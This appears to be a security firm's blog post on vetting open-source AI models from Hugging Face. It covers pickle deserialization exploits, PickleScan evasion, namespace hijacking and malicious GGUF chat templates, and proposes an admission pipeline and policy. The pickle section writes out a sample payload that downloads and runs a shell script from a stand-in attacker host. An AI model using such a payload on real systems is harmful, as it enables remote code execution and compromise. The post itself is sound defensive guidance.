Skip to main content
AI Security

Open Source AI Model Security: Vetting Hugging Face Downloads

BT

BeyondScale Team

AI Security Team

12 min read

Open source AI model security is where most enterprise AI deployments have the largest unaddressed gap. Organizations download models from Hugging Face, Ollama, and similar public hubs at scale, often without any formal admission process beyond "it worked in the notebook." This guide covers the specific attack surfaces that make open source model downloads dangerous, the tooling available today for enterprise vetting, and a practical model admission pipeline that security and ML teams can implement together.

Key Takeaways

    • 28,000+ models on Hugging Face are currently marked suspicious; 100+ confirmed malicious models were found in a single JFrog research sweep.
    • 95% of confirmed malicious ML models target PyTorch's pickle serialization format. A model file can execute arbitrary OS commands the moment it is loaded.
    • Hugging Face flags unsafe models but does not block downloads. PickleScan has seven confirmed bypass vulnerabilities documented between JFrog and Sonatype.
    • Namespace hijacking lets attackers inherit abandoned model paths and insert poisoned models into existing dependency chains. Unit 42 demonstrated this successfully against Google Vertex AI and Microsoft Azure AI Foundry.
    • GGUF models carry a distinct risk: malicious Jinja2 instructions embedded in chat templates execute at inference time, not at load time, bypassing all static file scanners.
    • SafeTensors eliminates pickle-based RCE entirely. Requiring SafeTensors format for all production model ingestion is the single highest-impact policy change an enterprise can make.
    • A model admission pipeline combining format policy, static scanning, behavioral analysis, and provenance verification reduces the attack surface to a manageable scope.

Why Open Source Model Trust Is Broken

Hugging Face hosts over 2.2 million models with roughly 15 million downloads per day. This scale has made it the default distribution channel for ML teams, but it was built for accessibility, not security. The platform's trust signals, a green "safe" badge and a download count, do not correspond to any meaningful security guarantee.

Consider the data. In a three-month continuous detection study, researchers found 91 malicious models and 9 malicious dataset loading scripts across the platform. 76 of those 91 used pickle deserialization exploits; 15 used Keras custom Lambda layer abuse. JFrog found over 100 malicious models in a single research sweep, with payloads including silent backdoors granting full shell access to compromised machines.

The adoption gap compounds the problem. Only 49% of organizations scan models for safety before deployment, according to HiddenLayer's 2026 AI Threat Landscape Report, while 97% use models from public repositories. That gap, between near-universal consumption and less than half-rate scanning, is where attackers operate.

Pickle Exploits: The Root Cause

PyTorch .pt, .pth, and .bin files are ZIP archives containing a data.pkl file. Pickle is Python's general-purpose object serialization format, designed for convenience rather than security. When Python deserializes a pickle stream, it executes the __reduce__ or __reduce_ex__ method of each class encountered. An attacker overrides __reduce__ to return (os.system, ("wget attacker.com/shell.sh -O /tmp/s && bash /tmp/s",)) or equivalent. That code runs at torch.load() time, before the model weights are ever examined.

The attack requires no vulnerability in PyTorch itself. It is the intended behavior of the pickle protocol, applied to a hostile input. The model file looks legitimate. The download completes normally. The infection runs silently.

The JFrog silent backdoor campaign demonstrated exactly this against data scientists using Hugging Face. Models were crafted with __reduce__ payloads that granted persistent shell access. Victims only needed to load the model. HiddenLayer's research separately demonstrated packaging ransomware inside a model file using the same mechanism.

CVE-2026-25874, disclosed in April 2026, extended this to Hugging Face's own robotics framework LeRobot. Unsafe deserialization via pickle.loads() over unauthenticated gRPC channels without TLS allowed an unauthenticated attacker to send a malicious serialized payload to the PolicyServer network port and execute arbitrary OS commands on GPU-backed inference servers, which commonly run with elevated privileges.

CVE-2025-1550 showed that Keras is not safe by default either. The vulnerability allowed arbitrary code execution even with safe_mode=True enabled: an attacker modifying config.json inside a .keras archive could specify arbitrary Python modules and functions to execute at model load time. Protect AI Guardian detected this on Hugging Face before public disclosure.

Scanner Evasion Is Documented and Widespread

The NullifAI campaign, analyzed by ReversingLabs in February 2025, demonstrated a technique that bypassed Hugging Face's own scanner. The malicious models used 7z compression instead of ZIP for the archive container. torch.load() failed on the outer wrapper, causing PickleScan to error out without reading the payload. But the malicious reverse shell instructions were placed at the beginning of the pickle stream, executing before PickleScan reached the broken portion. The models phoned home to a hardcoded IP and established persistent shells. Hugging Face removed them within 24 hours of disclosure, after they had already accumulated downloads.

JFrog and Sonatype have documented seven confirmed bypass vulnerabilities in PickleScan between them, including broken pickle stream evasion, archive format manipulation, and obfuscated opcode techniques. PickleScan is the scanner Hugging Face uses natively. An enterprise relying on the Hugging Face "safe" badge as a security control is relying on a scanner with known, documented bypasses.

Namespace Hijacking and the Deleted-Author Problem

Pickle exploits target the model file itself. Namespace hijacking targets the distribution channel.

When a Hugging Face account is deleted or abandoned, the username namespace is freed. An attacker can re-register it. Any repository that previously existed under that namespace, and any dependency pinned to huggingface.co/[old-username]/[model-repo] in a requirements file, CI configuration, or model registry, now resolves to the attacker's account.

Palo Alto Unit 42 demonstrated this as "model namespace reuse," successfully achieving reverse shell injection against orphaned models in Google Vertex AI Model Garden and Microsoft Azure AI Foundry Model Catalog. Legit Security named the Hugging Face variant "AI Jacking" and estimated tens of thousands of developers were potentially affected.

In practice, this means a model that passed a security review and was written into a CI pipeline can silently become malicious months later if the original author deletes their account. Version pinning to a specific commit hash, rather than a floating model version, mitigates this for static dependencies. But most organizations do not pin at that level, and model hubs do not enforce commit-level immutability the way package managers do.

GGUF Models: Inference-Time Attacks Beyond Static Scanning

GGUF is the dominant format for running quantized LLMs locally with tools like llama.cpp, Ollama, and LM Studio. As of January 2026, over 156,000 GGUF model files exist on Hugging Face across 2,500+ accounts.

GGUF files support a chat template field in their metadata, a Jinja2 template that formats prompts before they are sent to the model. Researchers at Splunk and Pillar Security demonstrated that attackers can embed malicious Jinja2 instructions directly in this template. The payload does not execute at load time. It executes at inference time, against every prompt processed by the model. This means a model can pass every static file scanner currently available and still carry an active payload that executes in production.

Static scanning tools that inspect file bytes cannot detect this class of attack without understanding the semantics of the template. Runtime monitoring, behavioral analysis during inference, and template inspection are required controls that no current open-source scanner provides.

Building an Enterprise Model Admission Pipeline

A model admission pipeline treats downloaded models the same way a network security team treats inbound traffic: inspect, classify, and enforce policy before allowing access to production systems. The following stages address the threat classes above.

Stage 1: Format policy enforcement

Require SafeTensors format for all production model ingestion as a default policy. SafeTensors stores only raw tensor data and metadata. There are no Python objects, no __reduce__ methods, and no code execution possible at load time. The format has been formally audited by EleutherAI and joined the PyTorch Foundation as an official project in 2025. As of early 2026, 42% of Hugging Face models are already tagged as SafeTensors, including most major open-weight models (Llama 3, Mistral, Gemma, Qwen, DeepSeek). For models only available in pickle-based formats, quarantine and manual review before production admission.

Stage 2: Static file scanning

Run models through a multi-format scanner before they enter any shared environment. Protect AI's open-source ModelScan covers PyTorch, TensorFlow, Keras, ONNX, and GGUF formats and integrates into CI/CD pipelines. For enterprise enforcement with audit trails, Protect AI Guardian or HiddenLayer's Model Scanner add 35+ format coverage, behavioral backdoor detection, AI Bill of Materials (AIBOM) generation, and integrations with Databricks Unity Catalog, SageMaker, and Azure AI Foundry. Cisco Foundation AI runs continuous scanning of all public Hugging Face files using a custom-fit ClamAV engine. Use at least two scanners in sequence. The documented bypass techniques that evade PickleScan may not evade Guardian or HiddenLayer's scanner. Defense in depth applies to scanning as much as it does to network security.

Stage 3: Provenance and namespace verification

Before downloading any model, verify that the publishing account is active, the repository is associated with a known organization (not a personal account), and the model's commit history is consistent with legitimate development. Flag any model where the namespace was registered less than 30 days ago. For models pulled from internal registries, enforce commit-hash pinning rather than floating version references. The Unit 42 namespace reuse attack vector is only exploitable if you allow floating namespace resolution.

Stage 4: Quarantine and behavioral analysis

Run new models in an air-gapped inference environment before admitting them to any shared GPU cluster or inference server. Monitor for outbound network connections, filesystem writes outside expected paths, unexpected subprocess spawning, and memory access patterns inconsistent with inference workloads. This stage is the primary defense against evasion techniques that bypass static scanners: the model may pass file inspection but reveal its payload under controlled execution. The NullifAI campaign payload phoned home to a hardcoded IP during model loading, which network egress monitoring would have detected immediately.

Stage 5: GGUF template inspection

For GGUF models specifically, extract and audit the chat template before deployment. Render the template against a set of test prompts in a sandboxed environment and inspect outputs for unexpected content, system command patterns, or exfiltration attempts. Automated template analysis is an emerging capability: Pillar Security's research provides the technical basis, and manual review by a security engineer familiar with Jinja2 is sufficient for low-volume intake.

Stage 6: Model signing and registry policy

Maintain an internal model registry that records the source URL, download hash, scan results, review status, and approving engineer for every model in use. Only models in the registry are permitted to run in production environments. Integrate registry checks into your ML platform's model loading path so that engineers attempting to load an unregistered model get a policy block, not a silent download. This is the enforcement layer that turns all of the above controls from advisory to mandatory.

Policy Template: AI Model Acceptable Use for Open Source

The following policy elements, adapted from NIST AI RMF 1.0 and OWASP LLM03:2025 guidance, provide a compliance-aligned foundation for enterprise model governance.

All production AI models must be acquired only from sources approved by the security team. Approved sources are recorded in the model registry and reviewed quarterly.

SafeTensors format is required for all models in production inference environments. Models available only in pickle-based formats require explicit security review and written approval before production admission.

Every model must pass static scanning by at least two approved scanners before entering the internal model registry. Scan reports are retained for 24 months.

Models must be run in an isolated behavioral analysis environment for a minimum of 48 hours before production admission. Network egress during this period is blocked and logged.

Namespace verification is required before download. Any model from a namespace registered in the last 30 days requires elevated review.

GGUF models require chat template inspection before deployment. Templates must be reviewed by a security engineer and the review result recorded in the model registry.

Internal links to existing BeyondScale resources on AI model supply chain security and AI security assessments provide context for teams building out these controls.

Compliance Framework Mapping

OWASP LLM03:2025 (Supply Chain) directly addresses third-party pre-trained models on public platforms as attack vectors and recommends provenance verification and model signing. LLM04:2025 (Data and Model Poisoning) covers manipulation of pre-training and fine-tuning data, with PoisonGPT cited as a real example of direct parameter manipulation bypassing safety features.

NIST AI RMF 1.0 and the Generative AI Profile (NIST-AI-600-1) provide the governance framework. The Govern, Map, Measure, and Manage functions address supply chain risks explicitly, including compromised models, datasets, and third-party APIs.

For regulated industries, the EU AI Act's requirements for high-risk AI systems include documentation of training data provenance and model integrity controls. A model admission pipeline with AIBOM generation per scan provides the artifact trail these requirements demand.

Conclusion

Open source AI model security is not a theoretical concern. JFrog, ReversingLabs, Palo Alto Unit 42, and academic researchers have all demonstrated live attacks against production-like environments using models pulled from Hugging Face. The tooling to defend against these attacks exists today: SafeTensors format policy, multi-scanner CI/CD integration, behavioral quarantine, and provenance verification together close the most critical attack surfaces.

The gap is not in available tools. It is in the absence of a formal admission process. Most ML teams treat model downloads the same way developers treated open source npm packages before the log4shell era: pull and run, trust the badge. The analogy is appropriate. The response is the same: formalize the intake process before the incident.

If your organization is deploying open source models in production and does not have a model admission pipeline in place, an AI security assessment is the fastest way to establish your current exposure and build the policy and tooling foundations your ML platform needs.

For teams building out controls now, the OWASP LLM Top 10 supply chain guidance and NIST AI RMF generative AI profile are the two most actionable external references. Both are linked above.

Share this article:
AI Security
BT

BeyondScale Team

AI Security Team, BeyondScale Technologies

Security researcher and engineer at BeyondScale Technologies, an ISO 27001 certified AI cybersecurity firm.

Want to know your AI security posture? Run a free Securetom scan in 60 seconds.

Start Free Scan

Ready to Secure Your AI Systems?

Get a comprehensive security assessment of your AI infrastructure.

Book a Meeting